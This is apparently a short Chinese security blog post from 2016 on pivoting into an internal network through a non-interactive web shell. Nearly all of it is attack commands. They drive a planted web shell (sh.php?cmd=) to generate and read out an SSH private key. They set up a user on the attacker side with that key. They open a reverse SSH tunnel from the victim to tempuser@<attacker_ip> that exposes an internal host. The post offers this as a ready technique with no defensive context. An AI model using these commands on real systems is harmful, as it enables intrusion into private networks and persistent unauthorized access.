MENU

使用非交互 Shell 打入内网

September 20, 2016 • Security

生成 shell 使用的 ssh 密钥

$ wget -O - -q "http://rinige.com/sh.php?cmd=whoami"
$ wget -O - -q "http://rinige.com/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" "
$ wget -O - -q "http://rinige.com/sh.php?cmd=cat /tmp/id_rsa"

增加用户 tempuser

$ useradd -m tempuser
$ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh
$ wget -O - -q "http://rinige.com/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys
$ chmod 700 /home/tempuser/.ssh/authorized_keys
$ chown -R tempuser:tempuser /home/tempuser/.ssh

反弹 ssh shell

$ wget -O - -q "http://rinige.com/sh.php?cmd=ssh -i /tmp/id_rsa -o StrictHostKeyChecking=no -R 127.0.0.1:8080:192.168.20.13:8080 -N -f tempuser@<attacker_ip>"
Archives QR Code
QR Code for this page
Tipping QR Code